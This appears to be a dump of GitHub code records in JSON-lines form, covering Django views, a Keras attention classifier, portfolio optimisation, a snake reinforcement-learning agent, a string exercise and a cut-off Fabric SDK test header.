'./results/queries/query_'+now+'.csv'\n \n # raise an error if not exists\n if not path.exists(filename):\n raise NameError(f\"Cannot read file named '{path.abspath(filename)}'.\")\n \n queryfilename = './results/onlyqueries/RDF_Llama2_gensim_'+filename.split('/query_')[1].split('.csv')[0]+'.txt'\n \n qf = open(queryfilename, mode='a', encoding=\"utf-8\")\n\n # memory = [] \n with open(filename, mode='r', encoding=\"utf-8\") as f:\n csv_file = csv.reader(f, delimiter=\",\")\n for row in csv_file:\n input, query = row\n \n if query == 'query':\n continue\n if input.startswith('['):\n continue\n \n qf.write(query)\n qf.write('\\n\\n')\n \n qf.close()\n \n print(f\"\\nquery saved: {queryfilename}\")\n return queryfilename\n\n\n# queryonly(filename='results/queries/query_YYYYmmdd_hh.csv') # ex) results/queries/query_20230825_14.csv","repo_name":"orangingq/LLM_experiment","sub_path":"results/queryonly.py","file_name":"queryonly.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28885795020","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import UserRegisterationForm, UserUpdateForm, ProfileUpdateForm\n\ndef register(request):\n if request.method == 'POST':\n form = UserRegisterationForm(request.POST)\n if form.is_valid():\n form.save() # comment it and users data will not save to db\n username = form.cleaned_data.get('username')\n messages.success(request, f'Your account has been created! You are now able to login')\n return redirect('login') #name of the URL pattern to linuxls home\n else:\n form = UserRegisterationForm()\n return render(request, 'users/register.html',{'form': form}) # Pass in form as context\n# Create your views here.\n\n@login_required\ndef profile(request):\n if request.method == 'POST':\n u_form = UserUpdateForm(request.POST, instance=request.user) # populate forms fields by passing instance of expected objects\n p_form = ProfileUpdateForm(request.POST,request.FILES, instance=request.user.profile)\n if u_form.is_valid() and p_form.is_valid():\n u_form.save()\n p_form.save()\n messages.success(request, f'Your account has been updated!')\n return redirect('profile')\n else:\n u_form = UserUpdateForm(instance=request.user) # populate forms fields by passing instance of expected objects\n p_form = ProfileUpdateForm()\n\n context = {\n 'u_form': u_form,\n 'p_form': p_form\n }\n return render(request, 'users/profile.html', context)\n","repo_name":"irtaza06/linuxls_project","sub_path":"www/linuxls_website/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"71049658491","text":"# Imports\n# Basic\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport os, random, math\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\n\n# DL\nimport tensorflow as tf\nimport keras\nimport keras.backend as K\nfrom keras.callbacks import Callback\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras import Model\nfrom keras.layers import Layer, Input, Embedding, Dropout, SpatialDropout1D, GlobalAveragePooling1D\nfrom keras.layers import GlobalMaxPooling1D, Bidirectional, GRU, CuDNNGRU, Activation, Dense\nfrom keras.layers import Dot, Reshape, TimeDistributed, concatenate, BatchNormalization\nfrom keras import initializers, regularizers, constraints\nfrom keras.optimizers import Adam\n\n# Visualization\nimport matplotlib.pyplot as plt\nfrom IPython.core.display import display, HTML\nimport seaborn as sns\nsns.set()\n# Util functions\n# Custom F1 callback\nclass F1Evaluation(Callback):\n def __init__(self, validation_data=(), interval=1):\n super(Callback, self).__init__()\n\n self.interval = interval\n self.X_val, self.y_val = validation_data\n\n def on_epoch_end(self, epoch, logs={}):\n if epoch % self.interval == 0:\n y_pred = self.model.predict(self.X_val, verbose=0)\n y_pred = (y_pred > 0.35).astype(int)\n score = metrics.f1_score(self.y_val, y_pred, average=\"micro\")\n print(\"\\n F1 Score - epoch: %d - score: %.6f \\n\" % (epoch+1, score))\n\ndef make_plot(loss, val_loss, acc, val_acc):\n t = np.arange(1,len(loss)+1,1)\n\n f, (ax1, ax2) = plt.subplots(1, 2, figsize=(15,3))\n plt.subplots_adjust(wspace=0.2)\n\n ax1.plot(t, loss)\n ax1.plot(t, val_loss)\n ax1.set_xlabel('epoch')\n ax1.set_ylabel('loss')\n ax1.set_title('Train vs Val loss')\n ax1.legend(['train','val'], ncol=2, loc='upper right')\n\n ax2.plot(t, acc)\n ax2.plot(t, val_acc)\n ax2.set_xlabel('epoch')\n ax2.set_ylabel('acc')\n ax2.set_title('Train vs Val acc')\n ax2.legend(['train','val'], ncol=2, loc='upper right')\n\n plt.show();\n\ndef rgb_to_hex(rgb):\n return '#%02x%02x%02x' % rgb\n \ndef attention2color(attention_score):\n r = 255 - int(attention_score * 255)\n color = rgb_to_hex((255, r, r))\n return str(color)\n\ndef visualize_attention():\n # Make new model for output predictions and attentions\n model_att = Model(inputs=model.input, \\\n outputs=[model.output, model.get_layer('attention_vec').output])\n idx = np.random.randint(low = 0, high=X_te.shape[0]) # Get a random test\n tokenized_sample = np.trim_zeros(X_te[idx]) # Get the tokenized text\n label_probs, attentions = model_att.predict(X_te[idx:idx+1]) # Perform the prediction\n\n # Get decoded text and labels\n id2word = dict(map(reversed, tokenizer.word_index.items()))\n decoded_text = [id2word[word] for word in tokenized_sample] \n \n # Get classification\n label = np.argmax((label_probs>0.5).astype(int).squeeze()) # Only one\n label2id = ['Sincere', 'Insincere']\n\n # Get word attentions using attenion vector\n token_attention_dic = {}\n max_score = 0.0\n min_score = 0.0\n for token, attention_score in zip(decoded_text, attentions[0][-len(tokenized_sample):]):\n token_attention_dic[token] = attention_score\n \n\n # Build HTML String to viualize attentions\n html_text = \"

    Text: \"\n for token, attention in token_attention_dic.items():\n html_text += \"{} \".format(attention2color(attention),\n token)\n #html_text += \"


    \"\n #html_text += \"

    Classified as: \"\n #html_text += label2id[label] \n #html_text += \"

    \"\n \n # Display text enriched with attention scores \n display(HTML(html_text))\n \n # PLOT EMOTION SCORES\n \n _labels = ['sincere', 'insincere']\n plt.figure(figsize=(5,2))\n plt.bar(np.arange(len(_labels)), label_probs.squeeze(), align='center', alpha=0.5, color=['black', 'red', 'green', 'blue', 'cyan', \"purple\"])\n plt.xticks(np.arange(len(_labels)), _labels)\n plt.ylabel('Scores')\n plt.show()\n \ndef under_sample(train_df):\n # UNDER SAMPLE\n insincere = len(train_df[train_df.target == 1])\n insincere_indices = train_df[train_df.target == 1].index\n\n sincere_indices = train_df[train_df.target == 0].index\n random_indices = np.random.choice(sincere_indices, insincere, replace=False)\n\n under_sample_indices = np.concatenate([insincere_indices,random_indices])\n under_sample = train_df.loc[under_sample_indices]\n train_df = under_sample.sample(frac=1)\n train_df.info()\n return train_df\n\ndef get_coefs(word, *arr): return word, np.asarray(arr, dtype='float32')\n\ndef get_embeddings_matrix():\n embeddings_index = dict(get_coefs(*o.rstrip().rsplit(' ')) for o in open(EMBEDDING_FILE))\n\n word_index = tokenizer.word_index\n nb_words = min(MAX_FEATURES, len(word_index))\n print('nb_words: %d' % nb_words)\n embedding_matrix = np.zeros((nb_words, EMB_SIZE))\n print('Embedding matrix shape: %d/%d' % (nb_words, EMB_SIZE))\n for word, i in word_index.items():\n if i >= nb_words: continue\n embedding_vector = embeddings_index.get(word)\n if embedding_vector is not None: embedding_matrix[i] = embedding_vector\n return embedding_matrix\n\ndef visualize_attention():\n # Make new model for output predictions and attentions\n '''\n model.get_layer('attention_vec').output:\n attention_vec (Attention) [(None, 128), (None, 54)] <- We want (None,54) that is the word att\n '''\n model_att = Model(inputs=model.input, \\\n outputs=[model.output, model.get_layer('attention_vec').output[-1]])\n idx = np.random.randint(low = 0, high=X_te.shape[0]) # Get a random test\n tokenized_sample = np.trim_zeros(X_te[idx]) # Get the tokenized text\n label_probs, attentions = model_att.predict(X_te[idx:idx+1]) # Perform the prediction\n\n # Get decoded text and labels\n id2word = dict(map(reversed, tokenizer.word_index.items()))\n decoded_text = [id2word[word] for word in tokenized_sample] \n \n # Get classification\n label = (label_probs>0.5).astype(int).squeeze() # Only one\n label2id = ['Sincere', 'Insincere']\n\n # Get word attentions using attenion vector\n token_attention_dic = {}\n max_score = 0.0\n min_score = 0.0\n \n attentions_text = attentions[0,-len(tokenized_sample):]\n #plt.bar(np.arange(0,len(attentions.squeeze())), attentions.squeeze())\n #plt.show();\n #print(attentions_text)\n attentions_text = (attentions_text - np.min(attentions_text)) / (np.max(attentions_text) - np.min(attentions_text))\n for token, attention_score in zip(decoded_text, attentions_text):\n #print(token, attention_score)\n token_attention_dic[token] = attention_score\n \n\n # Build HTML String to viualize attentions\n html_text = \"

    Text: \"\n for token, attention in token_attention_dic.items():\n html_text += \"{} \".format(attention2color(attention),\n token)\n #html_text += \"


    \"\n #html_text += \"

    Classified as: \"\n #html_text += label2id[label] \n #html_text += \"

    \"\n \n # Display text enriched with attention scores \n display(HTML(html_text))\n \n # PLOT EMOTION SCORES\n _labels = ['sincere', 'insincere']\n probs = np.zeros(2)\n probs[1] = label_probs\n probs[0] = 1- label_probs\n plt.figure(figsize=(5,2))\n plt.bar(np.arange(len(_labels)), probs.squeeze(), align='center', alpha=0.5, color=['black', 'red', 'green', 'blue', 'cyan', \"purple\"])\n plt.xticks(np.arange(len(_labels)), _labels)\n plt.ylabel('Scores')\n plt.show()\n# Util classes\nclass Attention(Layer):\n def __init__(self,\n W_regularizer=None, b_regularizer=None,\n W_constraint=None, b_constraint=None,\n bias=True, return_attention=False,\n **kwargs):\n self.supports_masking = True\n self.return_attention = return_attention\n self.init = initializers.get('glorot_uniform')\n\n self.W_regularizer = regularizers.get(W_regularizer)\n self.b_regularizer = regularizers.get(b_regularizer)\n\n self.W_constraint = constraints.get(W_constraint)\n self.b_constraint = constraints.get(b_constraint)\n\n self.bias = bias\n super(Attention, self).__init__(**kwargs)\n\n\n def build(self, input_shape):\n assert len(input_shape) == 3\n\n self.W = self.add_weight((input_shape[-1],),\n initializer=self.init,\n name='{}_W'.format(self.name),\n regularizer=self.W_regularizer,\n constraint=self.W_constraint)\n if self.bias:\n self.b = self.add_weight((input_shape[1],),\n initializer='zero',\n name='{}_b'.format(self.name),\n regularizer=self.b_regularizer,\n constraint=self.b_constraint)\n else:\n self.b = None\n\n self.built = True\n\n def compute_mask(self, input, input_mask=None):\n # do not pass the mask to the next layers\n return None\n\n def call(self, x, mask=None):\n eij = K.squeeze(K.dot(x, K.expand_dims(self.W)), axis=-1)\n\n if self.bias:\n eij += self.b\n\n eij = K.tanh(eij)\n\n a = K.exp(eij)\n\n # apply mask after the exp. will be re-normalized next\n if mask is not None:\n # Cast the mask to floatX to avoid float64 upcasting in theano\n a *= K.cast(mask, K.floatx())\n\n # in some cases especially in the early stages of training the sum may be almost zero\n # and this results in NaN's. A workaround is to add a very small positive number ε to the sum.\n # a /= K.cast(K.sum(a, axis=1, keepdims=True), K.floatx())\n a /= K.cast(K.sum(a, axis=1, keepdims=True) + K.epsilon(), K.floatx())\n\n weighted_input = x * K.expand_dims(a)\n\n result = K.sum(weighted_input, axis=1)\n\n if self.return_attention:\n return [result, a]\n return result\n\n def compute_output_shape(self, input_shape):\n if self.return_attention:\n return [(input_shape[0], input_shape[-1]),\n (input_shape[0], input_shape[1])]\n else:\n return input_shape[0], input_shape[-1]\n# Hyperparameters\n\nEMB_SIZE = 300\nMAX_FEATURES = 50000 # how many unique words to use (i.e num rows in embedding vector)\nMAX_LEN = 100 # Maximum length for texts\nEMBEDDING_FILE = '../input/embeddings/glove.840B.300d/glove.840B.300d.txt'\n# Load Train/Test\ntrain_df = pd.read_csv(\"../input/train.csv\")\ntest_df = pd.read_csv(\"../input/test.csv\")\nprint(\"Train shape : \",train_df.shape)\nprint(\"Test shape : \",test_df.shape)\n## split to train and val\ntrain_df, val_df = train_test_split(train_df, test_size=0.05, random_state=2018)\n\n## fill up the missing values\nX_tra = train_df[\"question_text\"].fillna(\"_na_\").values\nX_val = val_df[\"question_text\"].fillna(\"_na_\").values\nX_te = test_df[\"question_text\"].fillna(\"_na_\").values\n\n## Tokenize the sentences\ntokenizer = Tokenizer(num_words=MAX_FEATURES)\ntokenizer.fit_on_texts(list(X_tra))\nX_tra = tokenizer.texts_to_sequences(X_tra)\nX_val = tokenizer.texts_to_sequences(X_val)\nX_te = tokenizer.texts_to_sequences(X_te)\n\n## Pad the sentences \nMAX_LEN = min(MAX_LEN, len(max(X_tra, key=len)))\nX_tra = pad_sequences(X_tra, maxlen=MAX_LEN)\nX_val = pad_sequences(X_val, maxlen=MAX_LEN)\nX_te = pad_sequences(X_te, maxlen=MAX_LEN)\n\n## Get the target values\nY_tra = train_df['target'].values\nY_val = val_df['target'].values\n# Load embeddings\nembedding_matrix = get_embeddings_matrix()\n# Define input tensor\ninp = Input(shape=(X_tra.shape[1],), dtype='int32')\n\n# Word embedding layer\nembedded_inputs = Embedding(embedding_matrix.shape[0], embedding_matrix.shape[1], \n weights=[embedding_matrix], trainable = False)(inp)\n\n# Apply dropout to prevent overfitting\nembedded_inputs = SpatialDropout1D(0.2)(embedded_inputs)\n\n# Apply Bidirectional GRU over embedded inputs\nrnn_outs = Bidirectional(\\\n CuDNNGRU(64, return_sequences=True))(embedded_inputs)\nrnn_outs = Dropout(0.2)(rnn_outs) # Apply dropout to GRU outputs to prevent overfitting\n\n# Attention Mechanism - Generate attention vectors\nsentence, word_scores = Attention(return_attention=True, name = \"attention_vec\")(rnn_outs)\n\n# Dense layers\nfc = Dense(64, activation='relu')(sentence)\nfc = Dropout(0.5)(fc)\noutput = Dense(1, activation='sigmoid')(fc)\n\n# Finally building model\nmodel = Model(inputs=inp, outputs=output)\nmodel.compile(loss='binary_crossentropy', metrics=[\"accuracy\"], optimizer='adam')\n\n# Print model summary\nmodel.summary()\n# Train model\nF1_Score = F1Evaluation(validation_data=(X_val, Y_val), interval=1)\nhist = model.fit(X_tra, Y_tra, validation_data=(X_val, Y_val), \n epochs=3, batch_size=512, callbacks=[F1_Score])\nval_loss = hist.history['val_loss'];val_acc = hist.history['val_acc']\nloss = hist.history['loss'];acc = hist.history['acc']\nmake_plot(loss, val_loss, acc, val_acc)\nval_pred = model.predict([X_val], batch_size=1024, verbose=1)\nf1s = []\nmax_thresh, max_f1 = 0, 0\nfor thresh in np.arange(0.1, 0.9, 0.01):\n f1s.append(metrics.f1_score(Y_val, (val_pred>thresh)))\nmax_f1 = np.max(f1s)\nmax_thresh = np.arange(0.1, 0.9, 0.01)[np.argmax(f1s)]\nprint('Validation set: Max F1-Score: %.2f - reached with threshold: %.2f' % (max_f1, max_thresh))\nfor _ in range(3):\n visualize_attention()\ntest_pred = model.predict([X_te], batch_size=1024, verbose=1)\ntest_pred_thresh = (test_pred>max_thresh).astype(int)\nout_df = pd.DataFrame({\"qid\":test_df[\"qid\"].values})\nout_df['prediction'] = test_pred_thresh\nout_df.to_csv(\"submission.csv\", index=False)\nout_df.head()","repo_name":"aorursy/new-nb-1","sub_path":"alber8295_bigru-w-attention-visualized-for-beginners.py","file_name":"alber8295_bigru-w-attention-visualized-for-beginners.py","file_ext":"py","file_size_in_byte":14308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"69969682811","text":"# alter it to work with any list of securities\n# discover more about quadratic programming\n# explain the optimisation process in more detail\n# map out routes for web app\n# add delete and add buttons for web app\n# look at rendering graphs on a web app\n\nimport pandas_datareader as web\nfrom datetime import datetime\nimport datetime as dt\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nimport psycopg2\nimport cvxopt as opt\nfrom cvxopt import blas, solvers\nimport numpy as np\nimport matplotlib.dates as mdates\nimport pygal\nimport plotly\nimport plotly.graph_objs as go\nimport plotly.plotly as py\nimport plotly.tools as tls\nimport json\nimport mpld3\n\n\nsolvers.options['show_progress'] = False\nreturns_table = pd.read_csv(\"returns_data.csv\", sep=',')\nnormedret_table = pd.read_csv(\"normed_ret.csv\", sep=',')\nprice_table = pd.read_csv(\"price_data.csv\", sep=',')\n\nstocks = ['MSFT','AAPL','AMZN']\n\ndef get_ticker():\n ticker = input(\"Please enter the ticker: \").upper()\n return ticker\n\ndef get_data(ticker):\n\n start = datetime(2016, 9, 1)\n end = datetime(2019, 2, 1)\n\n f = web.DataReader(ticker, 'iex', start, end)\n df = f[\"close\"]\n print(df.head())\n return df\n\ndef get_data_and_append():\n ticker = get_ticker()\n data = (get_data(ticker))\n dates['{}'.format(ticker)] = (get_data(ticker)).tolist()\n\nreturn_vec = (((returns_table[stocks]).values).T)\n\ndef rand_weights(n):\n ''' Produces n random weights that sum to 1 '''\n k = np.random.rand(n)\n return k / sum(k)\n\ndef random_portfolio(returns):\n '''\n Returns the mean and standard deviation of returns for a random portfolio\n '''\n\n p = np.asmatrix(np.mean(returns, axis=1))\n w = np.asmatrix(rand_weights(returns.shape[0]))\n C = np.asmatrix(np.cov(returns))\n\n mu = w * p.T\n sigma = np.sqrt(w * C * w.T)\n\n # This recursion reduces outliers to keep plots pretty\n if sigma > 2:\n return random_portfolio(returns)\n return mu, sigma\n\nn_portfolios = 2000\nmeans, stds = np.column_stack([\n random_portfolio(return_vec)\n for _ in range(n_portfolios)\n])\n\ndef optimal_portfolio(returns):\n n = len(returns)\n returns = np.asmatrix(returns)\n\n N = 100\n mus = [10**(5.0 * t/N - 1.0) for t in range(N)]\n\n # Convert to cvxopt matrices\n S = opt.matrix(np.cov(returns))\n pbar = opt.matrix(np.mean(returns, axis=1))\n\n # Create constraint matrices\n G = -opt.matrix(np.eye(n)) # negative n x n identity matrix\n h = opt.matrix(0.0, (n ,1))\n A = opt.matrix(1.0, (1, n))\n b = opt.matrix(1.0)\n\n # Calculate efficient frontier weights using quadratic programming\n portfolios = [solvers.qp(mu*S, -pbar, G, h, A, b)['x']\n for mu in mus]\n ## CALCULATE RISKS AND RETURNS FOR FRONTIER\n returns = [blas.dot(pbar, x) for x in portfolios]\n risks = [np.sqrt(blas.dot(x, S*x)) for x in portfolios]\n ## CALCULATE THE 2ND DEGREE POLYNOMIAL OF THE FRONTIER CURVE\n m1 = np.polyfit(returns, risks, 2)\n print(m1[2])\n print(m1[0])\n x1 = np.sqrt(m1[2] / m1[0])\n # CALCULATE THE OPTIMAL PORTFOLIO\n wt = solvers.qp(opt.matrix(x1 * S), -pbar, G, h, A, b)['x']\n return np.asarray(wt), returns, risks\n\n\ndef print_optimization(stocks):\n\n weights, returns, risks = optimal_portfolio((((returns_table[stocks]).values).T))\n\n print(weights)\n\n n_portfolios = 2000\n means, stds = np.column_stack([\n random_portfolio((((returns_table[stocks]).values).T))\n for _ in range(n_portfolios)\n ])\n\n plt.plot(stds, means, 'o', markersize=2)\n plt.ylabel('mean')\n plt.xlabel('std')\n plt.plot(risks, returns, 'y-o', markersize=2)\n plt.show()\n\ndef print_stock_returns(stocks):\n\n fig = go.Figure()\n for i in stocks:\n fig.add_scatter(x=returns_table['date'], y=returns_table[i], name=i, mode='lines')\n\n graphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n return graphJSON\n\n\ndef calculate_portfolio_returns(stocks):\n\n #Change this later for a selected portfolio\n weights, returns, risks = optimal_portfolio((((returns_table[stocks]).values).T))\n portfolio = stocks\n equal_weights = [1 / len(portfolio)] * len(portfolio)\n optimal_weights = weights.flatten()\n print(\"The equal weighting: {}\".format(equal_weights))\n print(\"The optimal weighting: {}\".format(optimal_weights))\n weighted_stock_return = (normedret_table[stocks].multiply(optimal_weights,axis=1))\n weighted_portfolio_return = weighted_stock_return.sum(axis=1)\n cum_portfolio_return = ((weighted_portfolio_return[1] + 1).cumprod()) - 1\n\n data = [\n go.Scatter(\n x=price_table['date'], # assign x as the dataframe column 'x'\n y=weighted_portfolio_return\n )\n ]\n\n graphJSON = json.dumps(data, cls=plotly.utils.PlotlyJSONEncoder)\n\n return graphJSON\n\ndef print_stock_prices(stocks):\n\n fig = go.Figure()\n for i in stocks:\n fig.add_scatter(x=price_table['date'], y=price_table[i], name=i, mode='lines')\n\n graphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n return graphJSON\n","repo_name":"Alastair-Revell/markowitz_portfolio_opt","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":5089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40181134670","text":"import math\nimport random\nfrom collections import deque, namedtuple\nfrom itertools import count\n\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom IPython import display\n\nfrom snake_game import SnakeGame\nfrom snake_model import DQN\n\nplt.ion()\n\ndef plot(scores, mean_scores):\n display.clear_output(wait=True)\n #display.display(plt.gcf())\n plt.clf()\n plt.title('Training...')\n plt.xlabel('Number of Games')\n plt.ylabel('Score')\n plt.plot(scores)\n plt.plot(mean_scores)\n plt.ylim(ymin=0)\n plt.text(len(scores)-1, scores[-1], str(scores[-1]))\n plt.text(len(mean_scores)-1, mean_scores[-1], str(mean_scores[-1]))\n plt.show(block=False)\n plt.pause(.1)\n\n\n\n# if gpu is to be used\n\nTransition = namedtuple('Transition', ('state', 'action', 'next_state', 'reward', 'done'))\n\n\nclass ReplayMemory(object):\n\n def __init__(self, capacity):\n self.memory = deque([],maxlen=capacity)\n\n def push(self, *args):\n \"\"\"Save a transition\"\"\"\n self.memory.append(Transition(*args))\n\n def sample(self, batch_size):\n return random.sample(self.memory, batch_size)\n\n def __len__(self):\n return len(self.memory)\n\n\nclass SnakeAgent():\n def __init__(self, game, policy_net, target_net, optimizer, batch_size, replay_memory_size, target_update, device):\n # init game\n self.game = game\n self.device = device\n\n # init nets\n self.policy_net = policy_net\n self.target_net = target_net\n self.target_net.load_state_dict(self.policy_net.state_dict())\n self.target_net.eval()\n self.target_update = target_update\n\n # init optimizer and memory\n self.optimizer = optimizer\n self.replay_memory_size = replay_memory_size\n self.memory = ReplayMemory(replay_memory_size)\n \n # init training parameters\n self.batch_size = batch_size\n self.gamma = 0.9\n\n # exploration parameters\n self.eps_start = 0.9\n self.eps_end = 0\n self.eps_decay = 500\n self.steps_done = 0\n\n\n\n def get_state(self):\n\n grid_val = -10\n food_val = 1000\n snake_val = 1\n head_val = 10\n\n grid = grid_val*torch.ones(self.game.width, self.game.height)\n\n for i in range(1, len(self.game.snake)):\n grid[self.game.snake[i].x, self.game.snake[i].y] = snake_val\n\n if self.game.head.x == self.game.width:\n x_location = self.game.width - 1\n else:\n x_location = self.game.head.x\n\n if self.game.head.y == self.game.height:\n y_location = self.game.height - 1\n else:\n y_location = self.game.head.y\n\n grid[x_location, y_location] = head_val\n grid[self.game.food.x, self.game.food.y] = food_val\n\n return torch.unsqueeze(grid, 0)\n\n\n def select_action(self, state, mode='train'):\n sample = random.random()\n eps_threshold = self.eps_end + (self.eps_start - self.eps_end) * math.exp(-1. * self.steps_done / self.eps_decay)\n self.steps_done += 1\n\n # exploration\n if sample < eps_threshold and self.steps_done < self.replay_memory_size and mode == 'train':\n action = random.randint(0, 3)\n\n # exploitation\n else:\n state_0 = torch.unsqueeze(state, 0)\n prediction = self.policy_net(state_0.to(self.device))\n action = torch.argmax(prediction).item()\n\n return torch.tensor(action).view(1)\n\n\n def optimize_model(self):\n\n if len(self.memory) < self.batch_size:\n return\n\n transitions = self.memory.sample(self.batch_size)\n batch = Transition(*zip(*transitions))\n \n state_batch = torch.stack(batch.state).to(self.device)\n action_batch = torch.cat(batch.action).to(self.device)\n reward_batch = torch.cat(batch.reward).to(self.device)\n next_state_batch = torch.stack(batch.next_state).to(self.device)\n done_batch = torch.cat(batch.done).to(self.device)\n\n # Calculate Q values\n curr_Q = self.policy_net(state_batch).gather(1, action_batch.unsqueeze(1))\n next_Q = self.target_net(next_state_batch).max(1)[0].detach()\n expected_Q = reward_batch + (1 - done_batch) * (self.gamma * next_Q) \n\n # Compute loss\n criterion = nn.MSELoss()\n loss = criterion(curr_Q, expected_Q.unsqueeze(1))\n\n # Optimize the model\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n\n\ndef train():\n\n plot_scores = []\n plot_mean_scores = []\n total_score = 0\n total_score_batch = 0\n total_steps_per_game = 0\n record = 0\n\n n_actions = 4\n lr = 0.05\n num_total_games = 10000\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n game = SnakeGame(width=5, height=4, show_UI=0, gamespeed=1000)\n policy_net = DQN(game.width, game.height, n_actions).to(device)\n target_net = DQN(game.width, game.height, n_actions).to(device)\n optimizer = optim.Adam(policy_net.parameters(), lr=lr)\n scheduler = torch.optim.lr_scheduler.OneCycleLR(optimizer, lr, total_steps=num_total_games)\n agent = SnakeAgent(game, policy_net, target_net, optimizer, batch_size=64, replay_memory_size=10000, target_update=10, device=device)\n show_plot = False\n\n for num_games in range(num_total_games):\n # Initialize the environment and state\n game.restart()\n \n previous_state = agent.get_state()\n for t in count():\n # Get current state\n current_state = agent.get_state()\n state_memory = torch.cat([previous_state, current_state], 0) \n\n # Select and perform an action\n action = agent.select_action(state_memory)\n reward, done, score = game.play_step(action.item())\n reward = torch.tensor([reward], device=device)\n done = torch.tensor([done], device=device)\n\n # Observe new state\n next_state = agent.get_state()\n next_state_memory = torch.cat([current_state, next_state], 0) \n\n # update previous state\n previous_state = current_state\n\n # Store the transition in memory\n agent.memory.push(state_memory, action, next_state_memory, reward, done)\n\n # Perform one step of the optimization (on the policy network)\n agent.optimize_model()\n\n # if game is done\n if done:\n # adjust learning rate\n scheduler.step()\n\n # store record and save net\n if score > record: \n record = score\n\n # plot results \n if show_plot:\n total_score += score\n mean_score = total_score / num_games\n plot_scores.append(score)\n plot_mean_scores.append(mean_score)\n plot(plot_scores, plot_mean_scores)\n\n # log results\n total_steps_per_game += t\n total_score_batch += score\n if num_games % agent.batch_size == 0:\n mean_score = total_score_batch / agent.batch_size\n mean_steps_per_game = total_steps_per_game / agent.batch_size\n\n print(\n 'Game:', num_games, \n ' Record in batch:', record, \n ' mean score batch:', mean_score, \n ' mean steps per game:', mean_steps_per_game, \n ' Learning rate:', optimizer.param_groups[0]['lr']\n )\n \n record = 0\n total_score_batch = 0\n total_steps_per_game = 0\n agent.policy_net.save(file_name = 'snake_model_5x5_2.pth')\n \n break\n\n # Update the target network, copying all weights and biases in DQN\n if num_games % agent.target_update == 0:\n agent.target_net.load_state_dict(agent.policy_net.state_dict())\n\n\nif __name__ == '__main__':\n train()\n","repo_name":"Ibo-Git/neuralNetwork_shapes","sub_path":"snake_AI/snake_agent.py","file_name":"snake_agent.py","file_ext":"py","file_size_in_byte":8261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"6469217954","text":"def fix_start(s):\r\n \r\n return \"\".join((s[0], s[1:].replace(s[0], '*')))\r\n\r\ndef test(got, expected):\r\n if got == expected:\r\n prefix = ' OK '\r\n else:\r\n prefix = ' X '\r\n print('%s got: %s expected: %s' % (prefix, repr(got), repr(expected)))\r\n\r\n\r\n# Provided main() calls the above functions with interesting inputs,\r\n# using test() to check if each result is correct or not.\r\ndef main():\r\n print('fix_start')\r\n test(fix_start('babble'), 'ba**le')\r\n test(fix_start('aardvark'), 'a*rdv*rk')\r\n test(fix_start('google'), 'goo*le')\r\n test(fix_start('donut'), 'donut')\r\n\r\n# Standard boilerplate to call the main() function.\r\nif __name__ == '__main__':\r\n main()","repo_name":"jose-zanetti/PythonTutorial","sub_path":"LessonOne/FixStart.py","file_name":"FixStart.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22242189101","text":"from django.urls import path\nfrom .views import (\n\t\t# find_projects_by_client,\n\t\t# find_projects_by_date,\n\t\t# find_projects_by_status,\n\t\t# find_projects_by_client_date_status,\n\t\tfind_project_detail_report,\n\t\tSearchProjectsByClient,\n\t\tSearchProjectsByDate,\n\t\tSearchProjectsByStatus,\n\t\tSearchProjectsByClientDateStatus\n\t)\nfrom rest_framework.urlpatterns import format_suffix_patterns\n\n# project name\napp_name='search'\n\nurlpatterns = [\n # path('searchprojectsbyclient/', find_projects_by_client, name='searchprojectsbyclient'),\n path('searchprojectsbyclient/', SearchProjectsByClient.as_view(), name='searchprojectsbyclient'),\n path('searchprojectsbydate/', SearchProjectsByDate.as_view(), name='searchprojectsbydate'),\n # path('searchprojectsbydate/', find_projects_by_date, name='searchprojectsbydate'),\n # path('searchprojectsbystatus/', find_projects_by_status, name='searchprojectsbystatus'),\n path('searchprojectsbystatus/', SearchProjectsByStatus.as_view(), name='searchprojectsbystatus'),\n # path('searchprojectsbyclientdatestatus/', find_projects_by_client_date_status, name='searchprojectsbyclientdatestatus'),\n path('searchprojectsbyclientdatestatus/', SearchProjectsByClientDateStatus.as_view(), name='searchprojectsbyclientdatestatus'),\n path('searchprojectdetailedreport/', find_project_detail_report, name='searchprojectdetailedreport'),\n\n]\n\nurlpatterns = format_suffix_patterns(urlpatterns)","repo_name":"rohanneps/django","sub_path":"Django-Rest-Framework/rest_app/search/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"5544239929","text":"import os\nimport unittest\nfrom hfc.fabric.client import Client\nfrom hfc.fabric.transaction.tx_context import TXContext\nfrom hfc.util.crypto.crypto import Ecies\nfrom hfc.util import utils\nfrom test.integration.utils import get_orderer_org_user\nfrom test.integration.config import E2E_CONFIG\nfrom hfc.protos.msp import identities_pb2\nfrom hfc.protos.common import configtx_pb2\nfrom hfc.protos.common import common_pb2\nfrom google.protobuf.timestamp_pb2 import 